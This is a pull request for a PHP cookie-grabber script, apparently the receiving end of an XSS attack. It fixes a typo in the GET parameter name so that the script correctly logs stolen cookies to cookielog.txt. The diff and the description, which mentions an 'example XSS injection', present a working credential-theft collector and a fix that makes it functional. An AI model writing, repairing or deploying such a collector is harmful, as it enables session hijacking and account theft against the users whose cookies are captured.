### PR TITLE
Removed space from before c in _GET variable

### DIFF
--- a/cookiegrab.php
+++ b/cookiegrab.php
@@ -1,6 +1,6 @@
 <?php
 
-	$cookie = $_GET[" c"];
+	$cookie = $_GET["c"];
 	$file = fopen('cookielog.txt', 'a');
 	fwrite($file, $cookie . "\n\n");
 	/* 


### PR DESCRIPTION
The space in front of the character 'c' in _GET's value ' c' caused the name 'c' given to the cookie variable in the example XSS injection to not be parsed by the script and as such cause the script to fail. For this reason I propose that this space be removed from _GET's value.